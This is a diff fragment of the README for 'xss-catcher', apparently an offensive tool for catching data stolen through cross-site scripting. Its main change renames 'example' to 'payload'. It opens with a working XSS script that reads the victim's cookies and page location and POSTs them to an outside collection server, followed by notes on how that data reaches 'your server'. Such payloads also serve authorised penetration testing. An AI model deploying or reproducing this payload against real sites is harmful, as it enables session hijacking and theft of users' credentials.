ivan-sincek/xss-catcher/README.md

 <script>var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://myserver.com', true); xhr.send('{\"site\": \"' + encodeURIComponent(location.hostname + location.pathname) + '\", \"data\": \"' + encodeURIComponent(document.cookie) + "\"}");</script>
 ```

-First example above will send an HTTP POST request to your server with user-defined parameters as a form-data.
-Opt for this example whenever possible.
+First payload above will send an HTTP POST request to your server with user-defined parameters as a form-data.
+Opt for this payload whenever possible.

 To send user-defined parameters as a form-data, you must add `Content-Type: application/x-www-form-urlencoded` HTTP request header.

-Second example above will send an HTTP POST request to your server with raw data encoded in JSON.
+Second payload above will send an HTTP POST request to your server with raw data encoded in JSON.

 ---